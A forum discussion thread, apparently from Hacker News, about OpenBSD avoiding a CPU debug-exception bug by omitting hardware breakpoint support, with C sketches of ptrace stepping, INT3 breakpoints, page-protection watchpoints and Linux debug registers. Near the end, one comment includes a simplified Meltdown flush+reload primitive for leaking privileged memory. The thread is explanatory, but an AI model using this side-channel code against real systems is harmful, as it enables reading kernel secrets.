This seems a bit too self-congratulatory to be technically meaningful. What feature did they not use?
From the thread history, it sounds like they provided no way for a userspace debugger to (ask the kernel to) set a hardware breakpoint on a section of memory. That means that when you use gdb and set a single breakpoint on some instruction, gdb must instead fall back on single-stepping the entire program until it gets there, incurring at least four context switches per instruction (program being debugged -> exception to kernel -> switch to gdb -> "nope, not there yet" -> kernel resumes the program for one more instruction). It does avoid the bug by not letting the CPU defer a debug exception until after a syscall (because the only mode you get for debug exceptions is the one that unconditionally delivers it after every instruction), but it also makes breakpoints basically unusable for large software.
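To make the cost concrete, here is a rough sketch of that fallback against the BSD-flavored ptrace(2) interface (PT_STEP and friends). The target address is made up, the register field assumes OpenBSD/amd64's struct reg, and error handling is elided:

    /* Sketch: single-step the tracee until it reaches a target address.
       Assumes OpenBSD/amd64 (r_rip in struct reg); illustrative only. */
    #include <sys/types.h>
    #include <sys/ptrace.h>
    #include <sys/wait.h>
    #include <machine/reg.h>
    #include <stdio.h>
    #include <unistd.h>

    int main(void) {
        long target = 0x1000;                /* hypothetical breakpoint */
        pid_t pid = fork();
        if (pid == 0) {
            ptrace(PT_TRACE_ME, 0, 0, 0);
            execl("/bin/ls", "ls", (char *)NULL);
            _exit(1);
        }
        int status;
        waitpid(pid, &status, 0);            /* initial stop */
        while (WIFSTOPPED(status)) {
            struct reg r;
            ptrace(PT_GETREGS, pid, (caddr_t)&r, 0);
            if (r.r_rip == target)           /* finally there */
                break;
            /* one instruction: tracee -> kernel -> debugger -> kernel */
            ptrace(PT_STEP, pid, (caddr_t)1, 0);
            waitpid(pid, &status, 0);
        }
        printf("hit target (or tracee exited)\n");
        ptrace(PT_KILL, pid, 0, 0);
        return 0;
    }

Every iteration of that loop is a full round trip through the kernel and the debugger, which is where the per-instruction context-switch cost comes from.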
First, this isn't an obscure, recent, or Intel-only feature. It's not like avoiding RDRAND or anything. Hardware breakpoints are common on basically all CPUs for exactly this reason.
Second, does anyone actually debug large programs using gdb on OpenBSD? It is hard for me to read this as saying "We're not vulnerable because we have so few production users that we can just not have standard development tools that work reasonably." I know OpenBSD is not the most popular OS, but I didn't think it was that unpopular....
I think the hardware breakpoint support is for breaking on memory accesses to a particular address. Setting a breakpoint on execution of the instruction at a given address is easier and can be done by just swapping in an "INT 3" instruction at that point, with no overhead.
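That swap is a few lines with the word-oriented BSD ptrace(2) text accessors. A sketch (x86/little-endian assumed; the address choice and the restore path are left out):

    /* Plant an INT3 (0xCC) at addr in a traced process, saving the
       original word so it can be restored before resuming. Sketch only. */
    #include <sys/types.h>
    #include <sys/ptrace.h>
    #include <errno.h>

    int set_sw_breakpoint(pid_t pid, caddr_t addr, int *saved) {
        errno = 0;
        int word = ptrace(PT_READ_I, pid, addr, 0);
        if (word == -1 && errno != 0)
            return -1;
        *saved = word;
        int patched = (word & ~0xff) | 0xcc;   /* low byte on x86 */
        return ptrace(PT_WRITE_I, pid, addr, patched);
    }

To step past the breakpoint later, the debugger restores the saved word, rewinds the instruction pointer by one byte, single-steps once, and re-plants the 0xCC.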
Hardware breakpoint support also covers execution and, oddly, the x86 I/O port space reachable by the "in" and "out" instructions.
Using an int3 has some problems. It can be seen by the code, which may change behavior. For example, a self-checksum would fail. The int3 will affect all threads, while the hardware breakpoint can be made to affect just one thread.
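The self-checksum point is easy to demonstrate: any code that reads its own bytes will see the planted 0xCC instead of the original opcode. A contrived sketch (casting a function pointer to a data pointer is non-portable, but conventional here):

    #include <stdint.h>
    #include <stdio.h>

    int target(int x) { return x + 1; }    /* imagine int3 planted here */

    int main(void) {
        const uint8_t *p = (const uint8_t *)target;
        uint32_t sum = 0;
        for (int i = 0; i < 16; i++)       /* checksum first 16 code bytes */
            sum += p[i];
        /* With an INT3 planted in target, one byte reads back as 0xCC and
           the sum changes; a hardware breakpoint leaves the bytes alone. */
        printf("checksum: %u\n", sum);
        return 0;
    }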
Which is to say, no hardware support for watchpoints in gdb[1]? That seems like not such a great "feature"...
This is Theo being Theo. No one sane believes that if someone had come to OpenBSD with an implementation of this (very useful!) feature, they wouldn't have committed it. They just didn't get around to it.
[1] In which the fallback is, IIRC, to turn off access to the location at the mapping level and take a SIGSEGV on every access to the 4k region containing the address.
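That fallback looks roughly like this, modulo the ptrace boundary (an in-process sketch; a real debugger would also single-step the faulting access and then re-protect the page so the next access traps too):

    #include <signal.h>
    #include <stdio.h>
    #include <sys/mman.h>

    static char *page;
    static volatile sig_atomic_t hits;

    static void on_segv(int sig, siginfo_t *si, void *ctx) {
        (void)sig; (void)si; (void)ctx;
        hits++;                     /* every access to the page traps */
        mprotect(page, 4096, PROT_READ | PROT_WRITE);  /* let it retry */
    }

    int main(void) {
        struct sigaction sa = {0};
        sa.sa_sigaction = on_segv;
        sa.sa_flags = SA_SIGINFO;
        sigaction(SIGSEGV, &sa, NULL);
        page = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANON, -1, 0);
        mprotect(page, 4096, PROT_NONE);  /* "watch" a byte in this page */
        page[100] = 1;  /* traps even if offset 100 isn't the watched byte */
        printf("faults taken: %d\n", (int)hits);
        return 0;
    }

Note the false positives: the whole 4k page traps, not just the watched address, which is why this is so much slower than a real hardware watchpoint.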
It's crazy that DragonFlyBSD took so little time to fix it. I can understand Microsoft/Xen/Ubuntu taking only a day, since they have so many people working on and depending on them, but it shows great competence and dedication for such a "small" project as DragonFly to solve it in one day. Respect.
Am I misreading this or are you saying that without hardware breakpoints you have to single step all the way through the program to the breakpoint location?
If so: that's a surprising and weird thing to say. Without hardware breakpoints, userspace debuggers work by overwriting the instruction at the target with an interrupting instruction, and then restoring it before resuming.
I'm trying to imagine how gdb breakpoints in OpenBSD would even work if they required single-stepping whole programs.
> gdb must instead fall back on single-stepping the entire program until it gets there
I don’t think it’s that bad. gdb can (and hopefully does) just replace the target instruction with INT3. IMO the worse implication is that gdb can’t use efficient data breakpoints.
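For contrast, this is what the efficient version looks like on Linux, which does expose the x86 debug registers to debuggers via PTRACE_POKEUSER on the u_debugreg fields; OpenBSD has no equivalent knob. A sketch (the DR7 bit layout is from the Intel SDM; no error recovery):

    /* Arm DR0 as a 4-byte read/write hardware watchpoint on addr in a
       traced process (Linux/x86-64). Sketch only. */
    #include <stddef.h>
    #include <sys/ptrace.h>
    #include <sys/types.h>
    #include <sys/user.h>

    int set_hw_watchpoint(pid_t pid, unsigned long addr) {
        if (ptrace(PTRACE_POKEUSER, pid,
                   offsetof(struct user, u_debugreg[0]), addr) == -1)
            return -1;
        /* DR7: bit 0 enables DR0 locally; bits 16-17 = 11b (break on
           data read/write); bits 18-19 = 11b (4-byte length). */
        unsigned long dr7 = 0x1UL | (0x3UL << 16) | (0x3UL << 18);
        return ptrace(PTRACE_POKEUSER, pid,
                      offsetof(struct user, u_debugreg[7]), dr7);
    }

With that armed, the tracee runs at full speed and only traps on the watched access.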
Inefficient data breakpoints still seem like a dealbreaker for an OS aiming to be as popular as Windows or Linux, but I can see how OpenBSD can avoid them and still have a good number of users.
A quick google leads me to believe they suggest using ddb instead of gdb. I’ve seen variations on the following thread a few times. I don’t know whether this answers your question or not.
Personally, I think it’s valuable to take advantage of new features. AVX512 can be dozens of times faster than scalar operations, and clhash is the fastest strongly universal string hash library. There’s no good reason to pass on these kinds of performance improvements.
I know these aren’t the features in question, but casually dismissing the benefits of CPU improvements doesn’t strike me as productive.
On the other hand, I can’t remember the last time any non-interpreted system I deployed for my own use was too slow, even on low-wattage hardware / smallest available cloud instances.
At some point, “rock solid” is more important than “N% faster”.
As hardware gets faster, stability is the dominant consideration for a larger percentage of deployments.
True. But not implementing every Intel CPU feature "right away" would not be such a bad idea. As a security-conscious OS, they're wise not to implement certain features until there is a proven need for them, or until there is a mature understanding of the features. I for one choose Debian or OpenBSD for such needs. I don't need my firewall appliance (pf + OpenBSD) to be in a hurry to implement AVX512, for example.
I'd just pick one of the many bleeding-edge distributions for, say, a laptop.
I like performance. But OpenBSD supports hardware going a long way back. So you either break compatibility, ship more versions, or detect features on the fly, which works but has costs. On the other hand, if all x86_64 (amd64) hardware supports a feature, then it seems like a better bet.
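The on-the-fly detection is cheap but real: you compile both paths and pay a check (or an indirect call through a resolved function pointer) at dispatch time. A sketch using GCC/Clang's __builtin_cpu_supports; the two hash functions are hypothetical:

    #include <stdio.h>

    void hash_avx512(void);   /* hypothetical optimized path */
    void hash_scalar(void);   /* hypothetical portable fallback */

    int main(void) {
        if (__builtin_cpu_supports("avx512f"))
            puts("would dispatch to hash_avx512");
        else
            puts("would dispatch to hash_scalar");
        return 0;
    }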
Focusing on correctness and security isn't as popular or sexy as having the latest and greatest bleeding edge superfast stuff, until that stuff breaks and leaves your data vulnerable. But that's unpleasant, so it's easier to deflect than it is to question whether your goals should be adjusted.
That's not anywhere close to a prediction of Meltdown. Meltdown is a side-channel attack that can cross the user/kernel boundary. What Theo was predicting is that all chips are getting complex MMUs to the point that there are bugs in corner cases that could be exploited to create information leaks. Side channel attacks aren't bugs, insofar as no one is really promising that you can't observe side channels.
But the observable out-of-order execution used by these chips that led to Meltdown is a bug. Proof: AMD chips aren't affected by it:
> The Meltdown vulnerability primarily affects Intel microprocessors,[52] but some ARM microprocessors are also affected.[53] The vulnerability does not affect AMD microprocessors.[19][54][55][56] Intel has countered that the flaws affect all processors,[57] but AMD has denied this, saying "we believe AMD processors are not susceptible due to our use of privilege level protections within paging architecture".[58]
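For anyone who hasn't seen it, the "observable out-of-order execution" reduces to something like the following. This is a heavily simplified sketch of the Meltdown primitive: on unaffected or patched CPUs it recovers nothing, and a real exploit needs fault suppression (e.g. via TSX), retries, and noise filtering.

    #include <setjmp.h>
    #include <signal.h>
    #include <stdint.h>
    #include <x86intrin.h>          /* _mm_clflush, __rdtscp */

    #define LINE 4096
    static volatile uint8_t probe[256 * LINE];
    static sigjmp_buf recover;

    static void on_segv(int sig) { (void)sig; siglongjmp(recover, 1); }

    static int leak_one_byte(const volatile uint8_t *kernel_addr) {
        for (int i = 0; i < 256; i++)
            _mm_clflush((const void *)&probe[i * LINE]);  /* cold array */

        if (sigsetjmp(recover, 1) == 0) {
            uint8_t secret = *kernel_addr;  /* faults, but on affected  */
            (void)probe[secret * LINE];     /* CPUs may run transiently */
        }

        int best = 0;                       /* flush+reload: find the   */
        uint64_t best_dt = UINT64_MAX;      /* one warm probe line      */
        for (int i = 0; i < 256; i++) {
            unsigned aux;
            uint64_t t0 = __rdtscp(&aux);
            (void)probe[i * LINE];          /* volatile read, not elided */
            uint64_t t1 = __rdtscp(&aux);
            if (t1 - t0 < best_dt) { best_dt = t1 - t0; best = i; }
        }
        return best;
    }

    int main(void) {
        signal(SIGSEGV, on_segv);
        (void)leak_one_byte;  /* a real attack passes a privileged address */
        return 0;
    }

The point of contention is whether letting that dependent load execute transiently on a privileged value is a bug or an architecture-permitted optimization.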
Question: say you know 5 programming languages and 20 UI libraries. If tasked to write an application, would you attempt to use them all in the project?
That's fine, but it's not a great analogy, because once you ship software, everybody has access to that tool.
No matter if you agree or disagree, Theo/OpenBSD made an engineering choice and did what they thought was right for OpenBSD users. As fellow engineers, we should realize how difficult that is, and that the discussion deserves a bit more nuance, depth and respect.